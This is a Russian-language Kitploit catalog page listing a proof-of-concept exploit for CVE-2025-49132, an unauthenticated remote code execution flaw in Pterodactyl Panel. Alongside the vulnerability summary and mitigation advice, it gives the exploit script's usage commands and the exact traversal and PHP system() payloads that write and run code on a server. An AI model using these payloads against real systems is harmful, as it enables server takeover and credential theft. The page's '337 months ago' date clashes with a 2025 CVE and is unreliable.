Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE- — Эксплойт PoC для CVE-2025-49132 (GHSA-24wv-6c99-f843) – Неавторизованное удалённое выполнение кода в Pterodactyl Panel ≤ 1.11.10 | Kitploit
Инструменты/GitHubGitHub/dollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubdollarboysushil/cve-2025-49132-pterodactyl-panel-unauthenticated-remote-code-execution-rce-

CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE-

Эксплойт PoC для CVE-2025-49132 (GHSA-24wv-6c99-f843) – Неавторизованное удалённое выполнение кода в Pterodactyl Panel ≤ 1.11.10

РепозиторийСайт
337 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-49132

Pterodactyl Panel - Неаутентифицированное удаленное выполнение кода (RCE)


🔎 Краткое описание

CVE‑2025‑49132 — это критическая уязвимость удаленного выполнения кода, затрагивающая Pterodactyl Panel <= 1.11.10.

Неаутентифицированный злоумышленник может использовать неправильную проверку входных данных в конечной точке /locales/locale.json для выполнения произвольных системных команд.

Исправлено в версии: 1.11.11


📌 Воздействие

Успешная эксплуатация позволяет:

  • Неаутентифицированное удаленное выполнение кода
  • Чтение конфиденциальных файлов (например, .env)
  • Извлечение учетных данных базы данных
  • Полную компрометацию сервера

Серьезность: Критическая


🧠 Коренная причина

Уязвимость существует из-за неправильной проверки:

  • параметра locale
  • параметра namespace

Злоумышленник может:

  1. Использовать обход каталога (../../../../../)
  2. Воспользоваться config-create
  3. Записать произвольные PHP-полезные нагрузки в /tmp
  4. Запустить выполнение через специально созданную загрузку пространства имен

Классификация слабости: CWE-94 — Неправильный контроль генерации кода


🚀 Доказательство концепции (PoC)

Использование

python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]

Примеры

python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR

Путь по умолчанию:

/usr/share/php/PEAR

Получить правильный путь со страницы /phpinfo.php альтернативный текст


🛠 Процесс эксплуатации

Шаг 1 - Запись полезной нагрузки

Злоумышленник внедряет вредоносную PHP-полезную нагрузку в /tmp/payload.php с помощью:

/<?=system('id')?>+/tmp/payload.php

Шаг 2 --- Запуск выполнения

Вызовом:

?locale=../../../../../tmp&namespace=payload

Сервер выполняет внедренный PHP.

альтернативный текст

🛡 Смягчение

  • Обновление до Pterodactyl Panel >= 1.11.11
  • Очистка входных данных locale и namespace
  • Отключение опасных PHP-функций
  • Ограничение ненужного доступа к конечным точкам

📚 Ссылки

  • Консультация GitHub: GHSA-24wv-6c99-f843
  • CVE-2025-49132
  • Коммит исправления Pterodactyl Panel v1.11.11

Скачать инструмент